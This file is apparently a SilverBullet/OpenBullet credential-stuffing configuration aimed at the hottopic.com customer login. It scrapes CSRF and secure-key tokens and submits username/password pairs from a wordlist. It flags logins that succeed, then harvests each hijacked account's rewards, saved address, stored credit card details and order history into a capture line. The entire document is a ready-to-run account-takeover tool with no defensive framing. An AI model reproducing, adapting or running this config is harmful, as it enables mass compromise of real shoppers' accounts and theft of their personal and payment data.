[SETTINGS]
{
  "Name": "hottopic",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-26T09:15:43.3762639+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "hottopic",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.hottopic.com/account?dwcont=C1845007015" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"csrf_token\" value=\"" "\" />" -> VAR "tk" 

PARSE "<SOURCE>" LR "name=\"dwfrm_login_securekey\" value=\"" "\" />" -> VAR "key" 

PARSE "<SOURCE>" LR "<form action=\"https://www.hottopic.com/account?dwcont=" "\"" -> VAR "dw" 

REQUEST POST "https://www.hottopic.com/account?dwcont=<dw>" 
  CONTENT "dwfrm_login_username_d0mmkibxptzw=<USER>&dwfrm_login_password=<PASS>&dwfrm_login_login=Sign+In&dwfrm_login_rememberme=true&csrf_token=<tk>&dwfrm_login_securekey=<key>&reCaptcha=&dwcont=<dw>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry, this does not match our records." 
  KEYCHAIN Success OR 
    KEY "AVAILABLE REWARDS" 

PARSE "<SOURCE>" LR "<span class=\"rating-val\">" "</span>" -> VAR "ar" 

REQUEST GET "https://www.hottopic.com/addressbook" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<div class=\"mini-address-title\">" "</div>" -> VAR "add" 

REQUEST GET "https://www.hottopic.com/wallet" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<div class=\"card_info\">" "</div>" -> VAR "card" 

REQUEST GET "https://www.hottopic.com/on/demandware.store/Sites-hottopic-Site/default/OrderStatus-GetOrderList" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<a class=\"first_row\" href='" "'" Recursive=TRUE -> VAR "order" 

FUNCTION Constant "Available rewards: <ar> / Address: <add> / Credit Card: <card> / Orders: <order>" -> VAR "Capture" 

FUNCTION Translate UseVar=TRUE 
  KEY "<br />" VALUE "" 
  KEY "br" VALUE "" 
  KEY "<br" VALUE "" 
  KEY "<div class=\"billing-torrid-insider\">" VALUE "" 
  KEY "<div>" VALUE "" 
  "<Capture>" -> CAP "Cap" 

